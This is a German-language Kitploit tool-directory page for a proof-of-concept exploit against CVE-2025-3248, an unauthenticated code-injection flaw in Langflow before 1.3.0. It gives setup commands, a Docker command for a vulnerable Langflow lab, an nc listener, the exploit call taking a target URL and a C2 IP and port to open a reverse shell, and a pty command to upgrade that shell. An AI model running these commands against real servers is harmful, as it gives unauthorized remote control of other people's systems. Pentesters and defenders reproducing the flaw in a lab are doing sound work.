Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-3248 — PoC zur Erzielung von RCE in Langflow-Versionen <1.3.0 | Kitploit
Tools/GitHubGitHub/wand3rlust/cve-2025-3248
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlPayload-Entwicklung
GitHubwand3rlust/cve-2025-3248

CVE-2025-3248

PoC zur Erzielung von RCE in Langflow-Versionen <1.3.0

Repository anzeigen
vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-3248

Einführung

Langflow-Versionen vor 1.3.0 sind anfällig für nicht authentifizierte Code-Injection im Endpunkt /api/v1/validate/code über die Python-Funktion exec(). Dieser Exploit stellt eine Reverse-Shell-Verbindung her, die diese Schwachstelle ausnutzt.

Verwendung

Konfiguration

root@kitploit:~
git clone https://github.com/wand3rlust/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt

Verwundbare App

root@kitploit:~
docker pull langflowai/langflow:1.1.4
docker run -p 7860:7860 langflowai/langflow:1.1.4

Ausführen

root@kitploit:~
# Terminal 1
nc -nvlp <C2_PORT>

# Terminal 2
python3 cve-2025-3248.py <TARGET_URL> <C2_IP> <C2_PORT>

z. B.: python3 cve-2025-3248.py http://10.10.10.1:7860 10.0.13.37 1337

HINWEIS: Um die Shell zu einer TTY aufzuwerten, führen Sie nach dem Erhalt der Shell den folgenden Befehl aus.

python -c 'import pty; pty.spawn("/bin/bash")'

Demo

Demo

Referenzen

  • Advisory: https://nvd.nist.gov/vuln/detail/CVE-2025-3248
  • GitHub: https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7
  • Ursprünglicher Exploit: https://www.exploit-db.com/exploits/52262
Tool herunterladen